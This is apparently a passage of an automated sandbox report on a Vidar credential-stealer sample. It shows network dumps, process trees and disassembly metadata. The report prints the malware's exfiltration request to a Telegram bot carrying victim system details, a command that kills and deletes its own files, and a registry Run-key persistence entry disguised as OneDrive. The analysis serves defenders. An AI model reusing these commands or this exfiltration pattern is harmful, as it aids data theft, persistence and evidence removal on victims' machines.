64tbu25jjZXVOeAzwnAbjJVMzP0MMHqzIctsRDuwHN65dwg6TacFe8b9dJcsdaMWTYl813lLKht9uAei8rVtXJOAY0Q0nty9AGV3sUy2pvuLt3xiHftn6bToDkmNAP2sawq8azNDkAqF0sTAMG6DFeM58ZjzJuQpSv9lVUkEBM4m2s0GufdkpgZgQIUlEhtGZw2HsSkaFhCIbMJM2jDOyQWPJR2v94gbqtMrEOZtia
2022-05-16 08:29:53 UTC	6141	IN	Data Raw: 38 65 6d 6a 4d 61 4b 58 77 4e 45 46 58 67 7a 32 6c 49 47 34 31 75 4a 44 73 4b 4c 45 75 62 75 48 00 00 00 00 00 00 00 57 55 31 62 54 77 44 77 48 4b 45 6c 7a 53 53 6a 42 62 76 76 69 36 58 39 49 53 7a 32 34 44 53 70 4b 53 4b 51 45 44 63 38 4d 6f 6c 73 73 70 57 71 4d 77 6f 32 69 53 4b 6f 55 6e 39 6a 76 58 57 6e 76 62 57 30 46 30 47 48 30 00 00 00 00 00 00 00 45 74 7a 32 6d 65 52 70 66 77 59 33 52 62 30 37 78 6f 51 33 6a 4b 52 6b 44 6d 75 70 51 72 4e 73 4c 31 54 6d 76 59 4f 5a 35 62 4c 38 6c 47 66 55 4f 45 35 43 49 5a 4c 6b 34 4e 6e 61 72 31 6a 62 4a 42 75 46 39 73 50 32 77 00 00 00 00 00 00 00 65 4e 6b 73 37 56 5a 58 47 6c 6e 4e 71 72 4f 76 70 77 4e 6f 69 57 71 6f 33 6f 48 76 38 34 44 51 62 68 4b 53 71 36 6b 6c 76 34 37 4f 5a 69 39 77 42 42 4a 59 4b 45 6e 78 Data Ascii: 8emjMaKXwNEFXgz2lIG41uJDsKLEubuHWU1bTwDwHKElzSSjBbvvi6X9ISz24DSpKSKQEDc8MolsspWqMwo2iSKoUn9jvXWnvbW0F0GH0Etz2meRpfwY3Rb07xoQ3jKRkDmupQrNsL1TmvYOZ5bL8lGfUOE5CIZLk4Nnar1jbJBuF9sP2weNks7VZXGlnNqrOvpwNoiWqo3oHv84DQbhKSq6klv47OZi9wBBJYKEnx
2022-05-16 08:29:53 UTC	6157	IN	Data Raw: 56 70 79 32 49 30 33 6c 4f 4a 6a 4f 70 75 50 52 00 00 00 00 00 00 00 50 67 57 63 36 72 7a 74 32 36 78 6f 69 72 75 4c 72 77 78 4f 50 4f 4b 48 71 6c 76 50 73 4c 73 54 37 69 7a 46 73 50 31 6a 31 30 36 5a 70 50 70 4b 55 30 34 4b 4f 6b 35 55 61 37 4c 49 72 54 75 56 48 31 38 43 42 6b 74 52 72 00 00 00 00 00 00 00 76 78 72 30 38 49 45 53 38 6a 59 4e 63 72 33 34 78 54 66 74 30 64 37 67 68 5a 42 57 41 76 37 76 4f 61 58 72 79 67 36 4a 4a 36 39 65 68 41 5a 38 4b 69 30 36 33 72 61 35 63 32 44 55 49 49 71 30 33 66 43 64 44 44 78 61 41 00 00 00 00 00 00 00 52 57 47 61 70 39 33 53 32 35 75 65 39 43 48 42 6e 32 54 65 57 6c 51 6a 52 46 70 36 4e 4d 67 51 33 6d 73 6c 32 50 62 69 78 4e 4e 67 56 47 4e 54 44 42 32 68 76 7a 73 6f 6a 4c 36 42 59 4f 58 58 73 71 77 62 6c 79 55 37 Data Ascii: Vpy2I03lOJjOpuPRPgWc6rzt26xoiruLrwxOPOKHqlvPsLsT7izFsP1j106ZpPpKU04KOk5Ua7LIrTuVH18CBktRrvxr08IES8jYNcr34xTft0d7ghZBWAv7vOaXryg6JJ69ehAZ8Ki063ra5c2DUIIq03fCdDDxaARWGap93S25ue9CHBn2TeWlQjRFp6NMgQ3msl2PbixNNgVGNTDB2hvzsojL6BYOXXsqwblyU7
2022-05-16 08:29:53 UTC	6173	IN	Data Raw: 51 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 38 50 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 ff 53 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 4c 53 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 8e 53 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 19 6b 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 be 6a 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 8e 6f 41 00 92 6f 41 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 Data Ascii: QA8PASALSASAkAjAoAoA
2022-05-16 08:29:53 UTC	6189	IN	Data Raw: 38 a0 38 a4 38 a8 38 ac 38 b0 38 b4 38 b8 38 bc 38 c0 38 c4 38 c8 38 cc 38 d0 38 d4 38 d8 38 dc 38 88 39 90 39 98 39 9c 39 a0 39 a4 39 a8 39 ac 39 b0 39 b4 39 bc 39 c0 39 c4 39 c8 39 cc 39 d0 39 d4 39 d8 39 e4 39 ec 39 f4 39 f8 39 fc 39 00 3a 04 3a 08 3a 0c 3a 10 3a 14 3a 18 3a 1c 3a 20 3a 24 3a 28 3a 2c 3a 30 3a 34 3a 38 3a 3c 3a 40 3a 44 3a 48 3a 4c 3a 50 3a 54 3a f8 3f fc 3f 00 b0 5e 00 cc 01 00 00 00 30 04 30 08 30 0c 30 10 30 14 30 18 30 1c 30 20 30 24 30 28 30 2c 30 30 30 34 30 80 30 84 30 88 30 8c 30 90 30 94 30 98 30 9c 30 a0 30 a4 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d0 30 d4 30 d8 30 dc 30 e0 30 e4 30 e8 30 ec 30 f0 30 f4 30 f8 30 fc 30 00 31 04 31 08 31 0c 31 10 31 14 31 18 31 1c 31 20 31 24 31 28 31 34 31 38 31 3c 31 Data Ascii: 8888888888888888899999999999999999999999:::::::: :$:(:,:0:4:8:<:@:D:H:L:P:T:??^00000000 0$0(0,000400000000000000000000000000000000011111111 1$1(14181<1
2022-05-16 08:29:53 UTC	6205	IN	Data Raw: 08 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 07 80 30 77 06 08 2b 06 01 05 05 07 01 01 04 6b 30 69 30 2a 06 08 2b 06 01 05 05 07 30 01 86 1e 68 74 74 70 3a 2f 2f 74 73 2d 6f 63 73 70 2e 77 73 2e 73 79 6d 61 6e 74 65 63 2e 63 6f 6d 30 3b 06 08 2b 06 01 05 05 07 30 02 86 2f 68 74 74 70 3a 2f 2f 74 73 2d 61 69 61 2e 77 73 2e 73 79 6d 61 6e 74 65 63 2e 63 6f 6d 2f 73 68 61 32 35 36 2d 74 73 73 2d 63 61 2e 63 65 72 30 28 06 03 55 1d 11 04 21 30 1f a4 1d 30 1b 31 19 30 17 06 03 55 04 03 13 10 54 69 6d 65 53 74 61 6d 70 2d 32 30 34 38 2d 36 30 1d 06 03 55 1d 0e 04 16 04 14 a5 13 01 a9 9f 85 cc 1b 6e 16 1e 5f 3b 31 aa 79 36 00 7b 1d 30 1f 06 03 55 1d 23 04 18 30 16 80 14 af 63 d6 ca a3 4e 85 72 e0 a7 bc 41 f3 29 a2 38 7f 80 75 62 30 0d 06 09 2a 86 48 86 f7 0d 01 Data Ascii: 0U0w+k0i0+0http://ts-ocsp.ws.symantec.com0;+0/http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(U!0010UTimeStamp-2048-60Un_;1y6{0U#0cNrA)8ub0H

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49786	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-16 08:30:13 UTC	6206	OUT	GET /bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A HTTP/1.1 Accept: text/* User-Agent: soft Host: api.telegram.org Connection: Keep-Alive
2022-05-16 08:30:13 UTC	6206	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 16 May 2022 08:30:13 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2022-05-16 08:30:13 UTC	6207	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: MzRn1YNrbz.exePID: 7016, Parent PID: 5448

General

Target ID:	0
Start time:	10:29:25
Start date:	16/05/2022
Path:	C:\Users\user\Desktop\MzRn1YNrbz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MzRn1YNrbz.exe"
Imagebase:	0xf00000
File size:	2805688 bytes
MD5 hash:	BA041A9FC41225152308162AC9073707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7056, Parent PID: 7016

General

Target ID:	1
Start time:	10:29:27
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: AppLaunch.exePID: 6252, Parent PID: 7016

General

Target ID:	2
Start time:	10:29:34
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0x80000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.513911613.00000000052E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: SRT2H1V9CYLP5LNSR3MB.exePID: 4416, Parent PID: 6252

General

Target ID:	7
Start time:	10:29:56
Start date:	16/05/2022
Path:	C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe"
Imagebase:	0x100000
File size:	6341088 bytes
MD5 hash:	4A9ABB3B18F7EFB17C10DF19AE459B17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4764, Parent PID: 4416

General

Target ID:	8
Start time:	10:29:57
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4168, Parent PID: 6252

General

Target ID:	9
Start time:	10:29:58
Start date:	16/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\ProgramData\*.dll & exit
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6344, Parent PID: 4168

General

Target ID:	10
Start time:	10:29:59
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 6532, Parent PID: 4168

General

Target ID:	11
Start time:	10:30:00
Start date:	16/05/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im AppLaunch.exe /f
Imagebase:	0xbb0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 6780, Parent PID: 4168

General

Target ID:	12
Start time:	10:30:01
Start date:	16/05/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xa00000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: AppLaunch.exePID: 7108, Parent PID: 4416

General

Target ID:	14
Start time:	10:30:03
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0x80000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 3384, Parent PID: 7108

General

Target ID:	15
Start time:	10:30:08
Start date:	16/05/2022
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Imagebase:	0x340000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5596, Parent PID: 7108

General

Target ID:	16
Start time:	10:30:09
Start date:	16/05/2022
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
Imagebase:	0x340000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5244, Parent PID: 3384

General

Target ID:	17
Start time:	10:30:09
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5944, Parent PID: 5596

General

Target ID:	18
Start time:	10:30:10
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: MzRn1YNrbz.exePID: 7016, Parent PID: 5448COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	100

Executed Functions

Function 00F151A5 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000006,?,00F151A4,?,?,00000006,?), ref: 00F151C7
TerminateProcess.KERNEL32(00000000,?,00F151A4,?,?,00000006,?), ref: 00F151CE
ExitProcess.KERNEL32 ref: 00F151E0

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4d4fe806b607cb8b26ec1d68c8f552f0405983d1403ee872a1e119365adf00a1
Instruction ID: cd7b8c73c211318ec05d2cad63fa5273b966d19500e5084db9c63085e3dd4b36
Opcode Fuzzy Hash: 4d4fe806b607cb8b26ec1d68c8f552f0405983d1403ee872a1e119365adf00a1
Instruction Fuzzy Hash: 69E0B631440588EBCF266F54DD0DAEC3B69EB80755B104424F915AA125CB79EDC2EB41

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C4F0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(00F0C4FC,00F0BAD9), ref: 00F0C4F5

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e7e3dcca0d912237d81fb3d997a9d130789ffe016bb3ed2539fc1f66d9f2eb0a
Instruction ID: f824032c0b4b0d8534fa9842ea29d20a2c4d2f676ccf548c7aeb0f7fa707ca27
Opcode Fuzzy Hash: e7e3dcca0d912237d81fb3d997a9d130789ffe016bb3ed2539fc1f66d9f2eb0a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F20374 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c46293f579807448524893e16046145f0aad7aa07b816ca845a2e3e9e11bf2
Instruction ID: cfdd2596f63f233593f914005ecec8edd5dcb8ec3ddef46a368d368d011829b5
Opcode Fuzzy Hash: 87c46293f579807448524893e16046145f0aad7aa07b816ca845a2e3e9e11bf2
Instruction Fuzzy Hash: 49E08C32915238EBCB14DB88D90598AF3FCEB48B10F1104ABB501D3101C674DE00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F01CB0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F01CC4
_Yarn.LIBCPMTD ref: 00F01CCF
_Yarn.LIBCPMTD ref: 00F01CDA
_Yarn.LIBCPMTD ref: 00F01CE5
_Yarn.LIBCPMTD ref: 00F01CF0
_Yarn.LIBCPMTD ref: 00F01CFB
_Yarn.LIBCPMTD ref: 00F01D06
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F01D19

Part of subcall function 00F0B17B: _Yarn.LIBCPMT ref: 00F0B19A
Part of subcall function 00F0B17B: _Yarn.LIBCPMT ref: 00F0B1BE

Strings

bad locale name, xrefs: 00F01D23

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: cee2580f9319ae8fc098998966a8b128727058f232fdd3cb7986ae9527d956e5
Instruction ID: 50d22f058a09278696ea16b533abaa7950cf7e1b7c2971b655d5ff60021ee7a0
Opcode Fuzzy Hash: cee2580f9319ae8fc098998966a8b128727058f232fdd3cb7986ae9527d956e5
Instruction Fuzzy Hash: E601FF70A44108EBCB08EBE8DDA6BADB772AF44304F544069E902273C2DA346F50F7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F17BB1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 00F17C06
ext-ms-, xrefs: 00F17C1A

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 957c36bdf7e8b20e414e24d34147136df2c38b106a93531f7e674fc80a418b0d
Instruction ID: 73b5eaa7b0bd3e893d3c936aab6d55c70f10aa2ea8a2aeee9cd138ba6394aa22
Opcode Fuzzy Hash: 957c36bdf7e8b20e414e24d34147136df2c38b106a93531f7e674fc80a418b0d
Instruction Fuzzy Hash: B1112B72E0D325EBCB356A25DC80FEA37789F11774F110120E81EAB281D731DC81AAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00F15DE3 Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F1845A: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F1D6D2,?,00000000,?,00F22956,?,00000004,00000000,?,?,?,00F16BBE), ref: 00F1848C

_free.LIBCMT ref: 00F15EF2
_free.LIBCMT ref: 00F15F09
_free.LIBCMT ref: 00F15F26
_free.LIBCMT ref: 00F15F41
_free.LIBCMT ref: 00F15F58

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: add2980cd72de691cfad67e495c0fd5622a79d19e7a630d1bfc6d749e0980279
Instruction ID: 41ea9cc8482458cf24d80bb45ed6fbbddd058dcb39ffe0d80c411269ace5ea42
Opcode Fuzzy Hash: add2980cd72de691cfad67e495c0fd5622a79d19e7a630d1bfc6d749e0980279
Instruction Fuzzy Hash: B751E132E00705EFDB24DF29CC41BEAB3F5EF94B20B144569E809D7290E731DA81AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F08670 Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F0867B
int.LIBCPMTD ref: 00F0868D

Part of subcall function 00F01E70: std::_Lockit::_Lockit.LIBCPMT ref: 00F01E86
Part of subcall function 00F01E70: std::_Lockit::~_Lockit.LIBCPMT ref: 00F01EB0

Concurrency::cancel_current_task.LIBCPMTD ref: 00F086CD
std::_Lockit::~_Lockit.LIBCPMT ref: 00F08726

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

